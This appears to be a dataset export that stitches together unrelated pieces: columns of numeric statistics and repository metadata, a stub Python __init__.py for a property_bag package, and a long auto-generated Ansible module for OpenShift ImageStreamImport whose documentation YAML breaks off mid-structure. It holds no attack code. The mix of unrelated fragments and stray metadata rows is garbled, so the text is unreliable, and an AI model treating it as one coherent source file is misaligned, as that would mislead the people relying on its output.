| 0.762472
| 0.762472
| 0.747345
| 0.740264
| 0
| 0.012563
| 0.316123
| 11,989
| 256
| 128
| 46.832031
| 0.745335
| 0.060556
| 0
| 0.688679
| 1
| 0
| 0.194766
| 0.006587
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.018868
| 0
| 0.037736
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1c08b0c28ae17c5c9a349c6f727086a9b3709c9e
| 139
|
py
|
Python
|
property_bag/__init__.py
|
cbigler/python-property-bag
|
a877fda91c88731405415e936dd26c6677ee897f
|
[
"MIT"
] | null | null | null |
property_bag/__init__.py
|
cbigler/python-property-bag
|
a877fda91c88731405415e936dd26c6677ee897f
|
[
"MIT"
] | null | null | null |
property_bag/__init__.py
|
cbigler/python-property-bag
|
a877fda91c88731405415e936dd26c6677ee897f
|
[
"MIT"
] | null | null | null |
from .property_bag import PropertyBag
from .property_bag_parser import PropertyBagParser
def loads(text: str) -> PropertyBag:
pass
| 15.444444
| 50
| 0.784173
| 17
| 139
| 6.235294
| 0.705882
| 0.226415
| 0.283019
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.158273
| 139
| 8
| 51
| 17.375
| 0.905983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.25
| false
| 0.25
| 0.5
| 0
| 0.75
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 1
| 0
| 1
| 0
|
0
| 8
|
1c7d06066a458798285ab12dec2631bdfa22fd13
| 126,121
|
py
|
Python
|
ansible-container/openshift-deploy/roles/ansible.kubernetes-modules/library/openshift_v1_image_stream_import.py
|
LeHack/Docker-network-research
|
62a57a6d723d8701a6d045a07a5abd2bd844a409
|
[
"Beerware"
] | 4
|
2017-06-03T20:46:07.000Z
|
2017-12-19T02:15:00.000Z
|
ansible-container/openshift-deploy/roles/ansible.kubernetes-modules/library/openshift_v1_image_stream_import.py
|
LeHack/Docker-network-research
|
62a57a6d723d8701a6d045a07a5abd2bd844a409
|
[
"Beerware"
] | 1
|
2017-06-03T20:32:37.000Z
|
2017-06-03T20:32:37.000Z
|
ansible-container/openshift-deploy/roles/ansible.kubernetes-modules/library/openshift_v1_image_stream_import.py
|
LeHack/Docker-network-research
|
62a57a6d723d8701a6d045a07a5abd2bd844a409
|
[
"Beerware"
] | null | null | null |
#!/usr/bin/env python
from ansible.module_utils.openshift_common import OpenShiftAnsibleModule, OpenShiftAnsibleException
DOCUMENTATION = '''
module: openshift_v1_image_stream_import
short_description: OpenShift ImageStreamImport
description:
- Manage the lifecycle of a image_stream_import object. Supports check mode, and attempts
to to be idempotent.
version_added: 2.3.0
author: OpenShift (@openshift)
options:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource that may
be set by external tools to store and retrieve arbitrary metadata. They are
not queryable and should be preserved when modifying objects.
type: dict
api_key:
description:
- Token used to connect to the API.
cert_file:
description:
- Path to a certificate used to authenticate with the API.
type: path
context:
description:
- The name of a context found in the Kubernetes config file.
debug:
description:
- Enable debug output from the OpenShift helper. Logging info is written to KubeObjHelper.log
default: false
type: bool
force:
description:
- If set to C(True), and I(state) is C(present), an existing object will updated,
and lists will be replaced, rather than merged.
default: false
type: bool
host:
description:
- Provide a URL for acessing the Kubernetes API.
key_file:
description:
- Path to a key file used to authenticate with the API.
type: path
kubeconfig:
description:
- Path to an existing Kubernetes config file. If not provided, and no other connection
options are provided, the openshift client will attempt to load the default
configuration file from I(~/.kube/config.json).
type: path
labels:
description:
- Map of string keys and values that can be used to organize and categorize (scope
and select) objects. May match selectors of replication controllers and services.
type: dict
name:
description:
- Name must be unique within a namespace. Is required when creating resources,
although some resources may allow a client to request the generation of an appropriate
name automatically. Name is primarily intended for creation idempotence and
configuration definition. Cannot be updated.
namespace:
description:
- Namespace defines the space within each name must be unique. An empty namespace
is equivalent to the "default" namespace, but "default" is the canonical representation.
Not all objects are required to be scoped to a namespace - the value of this
field for those objects will be empty. Must be a DNS_LABEL. Cannot be updated.
password:
description:
- Provide a password for connecting to the API. Use in conjunction with I(username).
spec__import:
description:
- Import indicates whether to perform an import - if so, the specified tags are
set on the spec and status of the image stream defined by the type meta.
aliases:
- _import
type: bool
spec_images:
description:
- Images are a list of individual images to import.
aliases:
- images
type: list
spec_repository__from_api_version:
description:
- API version of the referent.
aliases:
- repository__from_api_version
spec_repository__from_field_path:
description:
- 'If referring to a piece of an object instead of an entire object, this string
should contain a valid JSON/Go field access statement, such as desiredState.manifest.containers[2].
For example, if the object reference is to a container within a pod, this would
take on a value like: "spec.containers{name}" (where "name" refers to the name
of the container that triggered the event) or if no container name is specified
"spec.containers[2]" (container with index 2 in this pod). This syntax is chosen
only to have some well-defined way of referencing a part of an object.'
aliases:
- repository__from_field_path
spec_repository__from_kind:
description:
- Kind of the referent.
aliases:
- repository__from_kind
spec_repository__from_name:
description:
- Name of the referent.
aliases:
- repository__from_name
spec_repository__from_namespace:
description:
- Namespace of the referent.
aliases:
- repository__from_namespace
spec_repository__from_resource_version:
description:
- Specific resourceVersion to which this reference is made, if any.
aliases:
- repository__from_resource_version
spec_repository__from_uid:
description:
- UID of the referent.
aliases:
- repository__from_uid
spec_repository_import_policy_insecure:
description:
- Insecure is true if the server may bypass certificate verification or connect
directly over HTTP during image import.
aliases:
- repository_import_policy_insecure
type: bool
spec_repository_import_policy_scheduled:
description:
- Scheduled indicates to the server that this tag should be periodically checked
to ensure it is up to date, and imported
aliases:
- repository_import_policy_scheduled
type: bool
spec_repository_include_manifest:
description:
- IncludeManifest determines if the manifest for each image is returned in the
response
aliases:
- repository_include_manifest
type: bool
spec_repository_reference_policy_type:
description:
- Type determines how the image pull spec should be transformed when the image
stream tag is used in deployment config triggers or new builds. The default
value is `Source`, indicating the original location of the image should be used
(if imported). The user may also specify `Local`, indicating that the pull spec
should point to the integrated Docker registry and leverage the registry's ability
to proxy the pull to an upstream registry. `Local` allows the credentials used
to pull this image to be managed from the image stream's namespace, so others
on the platform can access a remote image but have no access to the remote secret.
It also allows the image layers to be mirrored into the local registry which
the images can still be pulled even if the upstream registry is unavailable.
aliases:
- repository_reference_policy_type
ssl_ca_cert:
description:
- Path to a CA certificate used to authenticate with the API.
type: path
username:
description:
- Provide a username for connecting to the API.
verify_ssl:
description:
- Whether or not to verify the API server's SSL certificates.
type: bool
requirements:
- openshift == 1.0.0-snapshot
'''
EXAMPLES = '''
'''
RETURN = '''
api_version:
type: string
description: Requested API version
image_stream_import:
type: complex
returned: on success
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation of an object.
Servers should convert recognized schemas to the latest internal value, and
may reject unrecognized values.
type: str
kind:
description:
- Kind is a string value representing the REST resource this object represents.
Servers may infer this from the endpoint the client submits requests to. Cannot
be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource that
may be set by external tools to store and retrieve arbitrary metadata.
They are not queryable and should be preserved when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This is used to distinguish
resources with same name and namespace in different clusters. This field
is not set anywhere right now and apiserver is going to ignore it if set
in create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server time when this
object was created. It is not guaranteed to be set in happens-before order
across separate operations. Clients may not set this value. It is represented
in RFC3339 form and is in UTC. Populated by the system. Read-only. Null
for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully terminate before
it will be removed from the system. Only set when deletionTimestamp is
also set. May only be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this resource will
be deleted. This field is set by the server when a graceful deletion is
requested by the user, and is not directly settable by a client. The resource
is expected to be deleted (no longer visible from resource lists, and
not reachable by name) after the time in this field. Once set, this value
may not be unset or be set further into the future, although it may be
shortened or the resource may be deleted prior to this time. For example,
a user may request that a pod is deleted in 30 seconds. The Kubelet will
react by sending a graceful termination signal to the containers in the
pod. After that 30 seconds, the Kubelet will send a hard termination signal
(SIGKILL) to the container and after cleanup, remove the pod from the
API. In the presence of network partitions, this object may still exist
after this timestamp, until an administrator or automated process can
determine the resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the system when a graceful
deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry. Each entry
is an identifier for the responsible component that will remove the entry
from the list. If the deletionTimestamp of the object is non-nil, entries
in this list can only be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server, to generate a
unique name ONLY IF the Name field has not been provided. If this field
is used, the name returned to the client will be different than the name
passed. This value will also be combined with a unique suffix. The provided
value has the same validation rules as the Name field, and may be truncated
by the length of the suffix required to make the value unique on the server.
If this field is specified and the generated name exists, the server will
NOT return a 409 - instead, it will either return 201 Created or 500 with
Reason ServerTimeout indicating a unique name could not be found in the
time allotted, and the client should retry (optionally after the time
indicated in the Retry-After header). Applied only if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of the desired state.
Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize and categorize
(scope and select) objects. May match selectors of replication controllers
and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when creating resources,
although some resources may allow a client to request the generation of
an appropriate name automatically. Name is primarily intended for creation
idempotence and configuration definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within each name must be unique. An empty
namespace is equivalent to the "default" namespace, but "default" is the
canonical representation. Not all objects are required to be scoped to
a namespace - the value of this field for those objects will be empty.
Must be a DNS_LABEL. Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects in the list have
been deleted, this object will be garbage collected. If this object is
managed by a controller, then an entry in this list will point to this
controller, with the controller field set to true. There cannot be more
than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of this object that
can be used by clients to determine when objects have changed. May be
used for optimistic concurrency, change detection, and the watch operation
on a resource or set of resources. Clients must treat these values as
opaque and passed unmodified back to the server. They may only be valid
for a particular resource or set of resources. Populated by the system.
Read-only. Value must be treated as opaque by clients and .
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object. It is typically
generated by the server on successful creation of a resource and is not
allowed to change on PUT operations. Populated by the system. Read-only.
type: str
spec:
description:
- Spec is a description of the images that the user wishes to import
type: complex
contains:
_import:
description:
- Import indicates whether to perform an import - if so, the specified tags
are set on the spec and status of the image stream defined by the type
meta.
type: bool
images:
description:
- Images are a list of individual images to import.
type: list
contains:
_from:
description:
- From is the source of an image to import; only kind DockerImage is
allowed
type: complex
contains:
api_version:
description:
- API version of the referent.
type: str
field_path:
description:
- 'If referring to a piece of an object instead of an entire object,
this string should contain a valid JSON/Go field access statement,
such as desiredState.manifest.containers[2]. For example, if the
object reference is to a container within a pod, this would take
on a value like: "spec.containers{name}" (where "name" refers
to the name of the container that triggered the event) or if no
container name is specified "spec.containers[2]" (container with
index 2 in this pod). This syntax is chosen only to have some
well-defined way of referencing a part of an object.'
type: str
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
namespace:
description:
- Namespace of the referent.
type: str
resource_version:
description:
- Specific resourceVersion to which this reference is made, if any.
type: str
uid:
description:
- UID of the referent.
type: str
import_policy:
description:
- ImportPolicy is the policy controlling how the image is imported
type: complex
contains:
insecure:
description:
- Insecure is true if the server may bypass certificate verification
or connect directly over HTTP during image import.
type: bool
scheduled:
description:
- Scheduled indicates to the server that this tag should be periodically
checked to ensure it is up to date, and imported
type: bool
include_manifest:
description:
- IncludeManifest determines if the manifest for each image is returned
in the response
type: bool
reference_policy:
description:
- ReferencePolicy defines how other components should consume the image
type: complex
contains:
type:
description:
- Type determines how the image pull spec should be transformed
when the image stream tag is used in deployment config triggers
or new builds. The default value is `Source`, indicating the original
location of the image should be used (if imported). The user may
also specify `Local`, indicating that the pull spec should point
to the integrated Docker registry and leverage the registry's
ability to proxy the pull to an upstream registry. `Local` allows
the credentials used to pull this image to be managed from the
image stream's namespace, so others on the platform can access
a remote image but have no access to the remote secret. It also
allows the image layers to be mirrored into the local registry
which the images can still be pulled even if the upstream registry
is unavailable.
type: str
to:
description:
- To is a tag in the current image stream to assign the imported image
to, if name is not specified the default tag from from.name will be
used
type: complex
contains:
name:
description:
- Name of the referent.
type: str
repository:
description:
- Repository is an optional import of an entire Docker image repository.
A maximum limit on the number of tags imported this way is imposed by
the server.
type: complex
contains:
_from:
description:
- From is the source for the image repository to import; only kind DockerImage
and a name of a Docker image repository is allowed
type: complex
contains:
api_version:
description:
- API version of the referent.
type: str
field_path:
description:
- 'If referring to a piece of an object instead of an entire object,
this string should contain a valid JSON/Go field access statement,
such as desiredState.manifest.containers[2]. For example, if the
object reference is to a container within a pod, this would take
on a value like: "spec.containers{name}" (where "name" refers
to the name of the container that triggered the event) or if no
container name is specified "spec.containers[2]" (container with
index 2 in this pod). This syntax is chosen only to have some
well-defined way of referencing a part of an object.'
type: str
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
namespace:
description:
- Namespace of the referent.
type: str
resource_version:
description:
- Specific resourceVersion to which this reference is made, if any.
type: str
uid:
description:
- UID of the referent.
type: str
import_policy:
description:
- ImportPolicy is the policy controlling how the image is imported
type: complex
contains:
insecure:
description:
- Insecure is true if the server may bypass certificate verification
or connect directly over HTTP during image import.
type: bool
scheduled:
description:
- Scheduled indicates to the server that this tag should be periodically
checked to ensure it is up to date, and imported
type: bool
include_manifest:
description:
- IncludeManifest determines if the manifest for each image is returned
in the response
type: bool
reference_policy:
description:
- ReferencePolicy defines how other components should consume the image
type: complex
contains:
type:
description:
- Type determines how the image pull spec should be transformed
when the image stream tag is used in deployment config triggers
or new builds. The default value is `Source`, indicating the original
location of the image should be used (if imported). The user may
also specify `Local`, indicating that the pull spec should point
to the integrated Docker registry and leverage the registry's
ability to proxy the pull to an upstream registry. `Local` allows
the credentials used to pull this image to be managed from the
image stream's namespace, so others on the platform can access
a remote image but have no access to the remote secret. It also
allows the image layers to be mirrored into the local registry
which the images can still be pulled even if the upstream registry
is unavailable.
type: str
status:
description:
- Status is the the result of importing the image
type: complex
contains:
_import:
description:
- Import is the image stream that was successfully updated or created when
'to' was set.
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation of
an object. Servers should convert recognized schemas to the latest
internal value, and may reject unrecognized values.
type: str
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client submits
requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with a resource
that may be set by external tools to store and retrieve arbitrary
metadata. They are not queryable and should be preserved when
modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This is used
to distinguish resources with same name and namespace in different
clusters. This field is not set anywhere right now and apiserver
is going to ignore it if set in create or update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server time
when this object was created. It is not guaranteed to be set in
happens-before order across separate operations. Clients may not
set this value. It is represented in RFC3339 form and is in UTC.
Populated by the system. Read-only. Null for lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully terminate
before it will be removed from the system. Only set when deletionTimestamp
is also set. May only be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this resource
will be deleted. This field is set by the server when a graceful
deletion is requested by the user, and is not directly settable
by a client. The resource is expected to be deleted (no longer
visible from resource lists, and not reachable by name) after
the time in this field. Once set, this value may not be unset
or be set further into the future, although it may be shortened
or the resource may be deleted prior to this time. For example,
a user may request that a pod is deleted in 30 seconds. The Kubelet
will react by sending a graceful termination signal to the containers
in the pod. After that 30 seconds, the Kubelet will send a hard
termination signal (SIGKILL) to the container and after cleanup,
remove the pod from the API. In the presence of network partitions,
this object may still exist after this timestamp, until an administrator
or automated process can determine the resource is fully terminated.
If not set, graceful deletion of the object has not been requested.
Populated by the system when a graceful deletion is requested.
Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component that
will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only be removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server, to generate
a unique name ONLY IF the Name field has not been provided. If
this field is used, the name returned to the client will be different
than the name passed. This value will also be combined with a
unique suffix. The provided value has the same validation rules
as the Name field, and may be truncated by the length of the suffix
required to make the value unique on the server. If this field
is specified and the generated name exists, the server will NOT
return a 409 - instead, it will either return 201 Created or 500
with Reason ServerTimeout indicating a unique name could not be
found in the time allotted, and the client should retry (optionally
after the time indicated in the Retry-After header). Applied only
if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of the desired
state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize and
categorize (scope and select) objects. May match selectors of
replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when creating
resources, although some resources may allow a client to request
the generation of an appropriate name automatically. Name is primarily
intended for creation idempotence and configuration definition.
Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within each name must be unique. An
empty namespace is equivalent to the "default" namespace, but
"default" is the canonical representation. Not all objects are
required to be scoped to a namespace - the value of this field
for those objects will be empty. Must be a DNS_LABEL. Cannot be
updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects in the
list have been deleted, this object will be garbage collected.
If this object is managed by a controller, then an entry in this
list will point to this controller, with the controller field
set to true. There cannot be more than one managing controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of this object
that can be used by clients to determine when objects have changed.
May be used for optimistic concurrency, change detection, and
the watch operation on a resource or set of resources. Clients
must treat these values as opaque and passed unmodified back to
the server. They may only be valid for a particular resource or
set of resources. Populated by the system. Read-only. Value must
be treated as opaque by clients and .
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the system.
Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object. It
is typically generated by the server on successful creation of
a resource and is not allowed to change on PUT operations. Populated
by the system. Read-only.
type: str
spec:
description:
- Spec describes the desired state of this stream
type: complex
contains:
docker_image_repository:
description:
- DockerImageRepository is optional, if specified this stream is
backed by a Docker repository on this server
type: str
tags:
description:
- Tags map arbitrary string values to specific image locators
type: list
contains:
_from:
description:
- From is a reference to an image stream tag or image stream
this tag should track
type: complex
contains:
api_version:
description:
- API version of the referent.
type: str
field_path:
description:
- 'If referring to a piece of an object instead of an entire
object, this string should contain a valid JSON/Go field
access statement, such as desiredState.manifest.containers[2].
For example, if the object reference is to a container
within a pod, this would take on a value like: "spec.containers{name}"
(where "name" refers to the name of the container that
triggered the event) or if no container name is specified
"spec.containers[2]" (container with index 2 in this pod).
This syntax is chosen only to have some well-defined way
of referencing a part of an object.'
type: str
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
namespace:
description:
- Namespace of the referent.
type: str
resource_version:
description:
- Specific resourceVersion to which this reference is made,
if any.
type: str
uid:
description:
- UID of the referent.
type: str
annotations:
description:
- Annotations associated with images using this tag
type: complex
contains: str, str
generation:
description:
- Generation is the image stream generation that updated this
tag - setting it to 0 is an indication that the generation
must be updated. Legacy clients will send this as nil, which
means the client doesn't know or care.
type: int
import_policy:
description:
- Import is information that controls how images may be imported
by the server.
type: complex
contains:
insecure:
description:
- Insecure is true if the server may bypass certificate
verification or connect directly over HTTP during image
import.
type: bool
scheduled:
description:
- Scheduled indicates to the server that this tag should
be periodically checked to ensure it is up to date, and
imported
type: bool
name:
description:
- Name of the tag
type: str
reference:
description:
- Reference states if the tag will be imported. Default value
is false, which means the tag will be imported.
type: bool
reference_policy:
description:
- ReferencePolicy defines how other components should consume
the image
type: complex
contains:
type:
description:
- Type determines how the image pull spec should be transformed
when the image stream tag is used in deployment config
triggers or new builds. The default value is `Source`,
indicating the original location of the image should be
used (if imported). The user may also specify `Local`,
indicating that the pull spec should point to the integrated
Docker registry and leverage the registry's ability to
proxy the pull to an upstream registry. `Local` allows
the credentials used to pull this image to be managed
from the image stream's namespace, so others on the platform
can access a remote image but have no access to the remote
secret. It also allows the image layers to be mirrored
into the local registry which the images can still be
pulled even if the upstream registry is unavailable.
type: str
status:
description:
- Status describes the current state of this stream
type: complex
contains:
docker_image_repository:
description:
- DockerImageRepository represents the effective location this stream
may be accessed at. May be empty until the server determines where
the repository is located
type: str
tags:
description:
- Tags are a historical record of images associated with each tag.
The first entry in the TagEvent array is the currently tagged
image.
type: list
contains:
conditions:
description:
- Conditions is an array of conditions that apply to the tag
event list.
type: list
contains:
generation:
description:
- Generation is the spec tag generation that this status
corresponds to
type: int
last_transition_time:
description:
- LastTransitionTIme is the time the condition transitioned
from one status to another.
type: complex
contains: {}
message:
description:
- Message is a human readable description of the details
about last transition, complementing reason.
type: str
reason:
description:
- Reason is a brief machine readable explanation for the
condition's last transition.
type: str
status:
description:
- Status of the condition, one of True, False, Unknown.
type: str
type:
description:
- Type of tag event condition, currently only ImportSuccess
type: str
items:
description:
- Standard object's metadata.
type: list
contains:
created:
description:
- Created holds the time the TagEvent was created
type: complex
contains: {}
docker_image_reference:
description:
- DockerImageReference is the string that can be used to
pull this image
type: str
generation:
description:
- Generation is the spec tag generation that resulted in
this tag being updated
type: int
image:
description:
- Image is the image
type: str
tag:
description:
- Tag is the tag for which the history is recorded
type: str
images:
description:
- Images is set with the result of importing spec.images
type: list
contains:
image:
description:
- Image is the metadata of that image, if the image was located
type: complex
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to the
latest internal value, and may reject unrecognized values.
type: str
docker_image_config:
description:
- DockerImageConfig is a JSON blob that the runtime uses to set
up the container. This is a part of manifest schema v2.
type: str
docker_image_layers:
description:
- DockerImageLayers represents the layers in the image. May not
be set if the image does not define that data.
type: list
contains:
media_type:
description:
- MediaType of the referenced object.
type: str
name:
description:
- Name of the layer as defined by the underlying store.
type: str
size:
description:
- Size of the layer in bytes as defined by the underlying store.
type: int
docker_image_manifest:
description:
- DockerImageManifest is the raw JSON of the manifest
type: str
docker_image_manifest_media_type:
description:
- DockerImageManifestMediaType specifies the mediaType of manifest.
This is a part of manifest schema v2.
type: str
docker_image_metadata:
description:
- DockerImageMetadata contains metadata about this image
type: complex
contains:
raw:
description:
- Raw is the underlying serialization of this object.
type: str
docker_image_metadata_version:
description:
- DockerImageMetadataVersion conveys the version of the object,
which if empty defaults to "1.0"
type: str
docker_image_reference:
description:
- DockerImageReference is the string that can be used to pull this
image.
type: str
docker_image_signatures:
description:
- DockerImageSignatures provides the signatures as opaque blobs.
This is a part of manifest schema v1.
type: list
contains: str
kind:
description:
- Kind is a string value representing the REST resource this object
represents. Servers may infer this from the endpoint the client
submits requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with a
resource that may be set by external tools to store and retrieve
arbitrary metadata. They are not queryable and should be preserved
when modifying objects.
type: complex
contains: str, str
cluster_name:
description:
- The name of the cluster which the object belongs to. This
is used to distinguish resources with same name and namespace
in different clusters. This field is not set anywhere right
now and apiserver is going to ignore it if set in create or
update request.
type: str
creation_timestamp:
description:
- CreationTimestamp is a timestamp representing the server time
when this object was created. It is not guaranteed to be set
in happens-before order across separate operations. Clients
may not set this value. It is represented in RFC3339 form
and is in UTC. Populated by the system. Read-only. Null for
lists.
type: complex
contains: {}
deletion_grace_period_seconds:
description:
- Number of seconds allowed for this object to gracefully terminate
before it will be removed from the system. Only set when deletionTimestamp
is also set. May only be shortened. Read-only.
type: int
deletion_timestamp:
description:
- DeletionTimestamp is RFC 3339 date and time at which this
resource will be deleted. This field is set by the server
when a graceful deletion is requested by the user, and is
not directly settable by a client. The resource is expected
to be deleted (no longer visible from resource lists, and
not reachable by name) after the time in this field. Once
set, this value may not be unset or be set further into the
future, although it may be shortened or the resource may be
deleted prior to this time. For example, a user may request
that a pod is deleted in 30 seconds. The Kubelet will react
by sending a graceful termination signal to the containers
in the pod. After that 30 seconds, the Kubelet will send a
hard termination signal (SIGKILL) to the container and after
cleanup, remove the pod from the API. In the presence of network
partitions, this object may still exist after this timestamp,
until an administrator or automated process can determine
the resource is fully terminated. If not set, graceful deletion
of the object has not been requested. Populated by the system
when a graceful deletion is requested. Read-only.
type: complex
contains: {}
finalizers:
description:
- Must be empty before the object is deleted from the registry.
Each entry is an identifier for the responsible component
that will remove the entry from the list. If the deletionTimestamp
of the object is non-nil, entries in this list can only be
removed.
type: list
contains: str
generate_name:
description:
- GenerateName is an optional prefix, used by the server, to
generate a unique name ONLY IF the Name field has not been
provided. If this field is used, the name returned to the
client will be different than the name passed. This value
will also be combined with a unique suffix. The provided value
has the same validation rules as the Name field, and may be
truncated by the length of the suffix required to make the
value unique on the server. If this field is specified and
the generated name exists, the server will NOT return a 409
- instead, it will either return 201 Created or 500 with Reason
ServerTimeout indicating a unique name could not be found
in the time allotted, and the client should retry (optionally
after the time indicated in the Retry-After header). Applied
only if Name is not specified.
type: str
generation:
description:
- A sequence number representing a specific generation of the
desired state. Populated by the system. Read-only.
type: int
labels:
description:
- Map of string keys and values that can be used to organize
and categorize (scope and select) objects. May match selectors
of replication controllers and services.
type: complex
contains: str, str
name:
description:
- Name must be unique within a namespace. Is required when creating
resources, although some resources may allow a client to request
the generation of an appropriate name automatically. Name
is primarily intended for creation idempotence and configuration
definition. Cannot be updated.
type: str
namespace:
description:
- Namespace defines the space within each name must be unique.
An empty namespace is equivalent to the "default" namespace,
but "default" is the canonical representation. Not all objects
are required to be scoped to a namespace - the value of this
field for those objects will be empty. Must be a DNS_LABEL.
Cannot be updated.
type: str
owner_references:
description:
- List of objects depended by this object. If ALL objects in
the list have been deleted, this object will be garbage collected.
If this object is managed by a controller, then an entry in
this list will point to this controller, with the controller
field set to true. There cannot be more than one managing
controller.
type: list
contains:
api_version:
description:
- API version of the referent.
type: str
controller:
description:
- If true, this reference points to the managing controller.
type: bool
kind:
description:
- Kind of the referent.
type: str
name:
description:
- Name of the referent.
type: str
uid:
description:
- UID of the referent.
type: str
resource_version:
description:
- An opaque value that represents the internal version of this
object that can be used by clients to determine when objects
have changed. May be used for optimistic concurrency, change
detection, and the watch operation on a resource or set of
resources. Clients must treat these values as opaque and passed
unmodified back to the server. They may only be valid for
a particular resource or set of resources. Populated by the
system. Read-only. Value must be treated as opaque by clients
and .
type: str
self_link:
description:
- SelfLink is a URL representing this object. Populated by the
system. Read-only.
type: str
uid:
description:
- UID is the unique in time and space value for this object.
It is typically generated by the server on successful creation
of a resource and is not allowed to change on PUT operations.
Populated by the system. Read-only.
type: str
signatures:
description:
- Signatures holds all signatures of the image.
type: list
contains:
api_version:
description:
- APIVersion defines the versioned schema of this representation
of an object. Servers should convert recognized schemas to
the latest internal value, and may reject unrecognized values.
type: str
conditions:
description:
- Conditions represent the latest available observations of
a signature's current state.
type: list
contains:
last_probe_time:
description:
- Last time the condition was checked.
type: complex
contains: {}
last_transition_time:
description:
- Last time the condition transit from one status to another.
type: complex
contains: {}
message:
description:
- Human readable message indicating details about last transition.
type: str
reason:
description:
- (brief) reason for the condition's last transition.
type: str
status:
description:
- Status of the condition, one of True, False, Unknown.
type: str
type:
description:
- Type of signature condition, Complete or Failed.
type: str
content:
description:
- "Required: An opaque binary string which is an image's signature."
type: str
created:
description:
- If specified, it is the time of signature's creation.
type: complex
contains: {}
image_identity:
description:
- A human readable string representing image's identity. It
could be a product name and version, or an image pull spec
(e.g. "registry.access.redhat.com/rhel7/rhel:7.2").
type: str
issued_by:
description:
- If specified, it holds information about an issuer of signing
certificate or key (a person or entity who signed the signing
certificate or key).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
issued_to:
description:
- If specified, it holds information about a subject of signing
certificate or key (a person or entity who signed the image).
type: complex
contains:
common_name:
description:
- Common name (e.g. openshift-signing-service).
type: str
organization:
description:
- Organization name.
type: str
public_key_id:
description:
- If present, it is a human readable key id of public key
belonging to the subject used to verify image signature.
It should contain at least 64 lowest bits of public key's
fingerprint (e.g. 0x685ebe62bf278440).
type: str
kind:
description:
- Kind is a string value representing the REST resource this
object represents. Servers may infer this from the endpoint
the client submits requests to. Cannot be updated. In CamelCase.
type: str
metadata:
description:
- Standard object's metadata.
type: complex
contains:
annotations:
description:
- Annotations is an unstructured key value map stored with
a resource that may be set by external tools to store
and retrieve arbitrary metadata. They are not queryable
and should be preserved when modifying objects.
type: complex
